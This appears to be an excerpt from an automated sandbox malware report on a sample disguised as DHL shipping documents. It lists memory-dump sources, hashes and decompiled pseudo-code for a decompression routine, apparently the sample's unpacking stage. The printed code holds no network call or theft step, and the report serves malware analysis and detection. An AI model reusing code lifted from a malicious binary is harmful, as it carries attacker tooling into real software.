                        0x004071e2
                        0x004071e5
                        0x00000000
                        0x00000000
                        0x00406f44
                        0x00406f44
                        0x00406f48
                        0x0040758d
                        0x00000000
                        0x0040758d
                        0x00406f4e
                        0x00406f51
                        0x00406f54
                        0x00406f57
                        0x00406f5a
                        0x00406f5d
                        0x00406f60
                        0x00406f62
                        0x00406f65
                        0x00406f68
                        0x00406f6b
                        0x00406f6d
                        0x00406f6d
                        0x00406f6d
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0040734c
                        0x0040734c
                        0x0040734c
                        0x00407350
                        0x00000000
                        0x00000000
                        0x00407356
                        0x00407359
                        0x0040735c
                        0x0040735f
                        0x00407361
                        0x00407361
                        0x00407361
                        0x00407364
                        0x00407367
                        0x0040736a
                        0x0040736d
                        0x00407370
                        0x00407373
                        0x00407374
                        0x00407376
                        0x00407376
                        0x00407376
                        0x00407379
                        0x0040737c
                        0x0040737f
                        0x00407382
                        0x00407385
                        0x00407389
                        0x0040738b
                        0x0040738e
                        0x00000000
                        0x00407390
                        0x00000000
                        0x00407390
                        0x0040738e
                        0x004075c3
                        0x00000000
                        0x00000000
                        0x00406bf2

                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
                        • Instruction ID: 0a676f48c9952aad729ccf503b6a86ce95496029d8c73069f89f3073be052f6e
                        • Opcode Fuzzy Hash: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
                        • Instruction Fuzzy Hash: C3813471D08228DFDF24CFA8C8847ADBBB1FB44305F24816AD456BB281D778A986DF05
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00406FFE Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                        Download Yara Rule
                        C-Code - Quality: 98%
                        			E00406FFE() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M00407602))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8));
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
